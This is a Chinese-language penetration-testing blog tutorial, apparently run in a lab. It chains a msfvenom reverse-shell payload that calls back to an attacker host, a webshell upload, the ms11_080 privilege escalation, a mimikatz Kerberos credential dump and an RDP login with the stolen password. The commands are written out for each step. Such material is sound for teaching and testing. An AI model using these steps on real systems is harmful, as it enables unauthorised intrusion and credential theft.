最新消息:

服务器提权及Mimikatz密码获取

渗透测试 Eternal 10346浏览 0评论

Mimikatz是一款在内网渗透中,广泛使用的密码抓取神器。它类似于法国神器 getpass ,利用它我们可以在不修改和添加账户的情况下,直接获取管理员甚至域账户的密码。下面来简单演示下操作过程!

首先我们利用 msfvenom 来生成一个反弹shell程序。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=4444 -f exe -o /root/2003.exe

20160729065309

同时,我们再来创建一个反弹处理进程。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.111

exploit -j

20160729065809??20160729065902

然后我们来到 webshell 界面,将生成的 EXE 文件上传到可读可写目录,并执行该程序!

20160729065729

接着我们就可以在处理会话界面看到有两个反弹会话,这里我选择第一个。

sessions -i 1

20160729070138

到这里我们还不是系统权限,下面我们用溢出程序进行提权操作。

use exploit/windows/local/ms11_080_…..

set session 1

exploit

20160729070343

此时,我们使用 getuid 命令,就可以看到权限已经提升为 system 权限!

20160729070546

接着我们来载入 mimikatz 模块。

load mimikatz

20160729070634

使用 kerberos 来取得系统的账户密码信息。

20160729070912

最后,我们就可以使用 rdesktop 协议,来远程连接 3389 了!

rdesktop -f 192.168.1.115:3389 -u Administrator -p 2003

20160729080428

原创文章,转载请注明来源 即刻安全

转载请注明:即刻安全 » 服务器提权及Mimikatz密码获取

您必须 登录 才能发表评论!



合作伙伴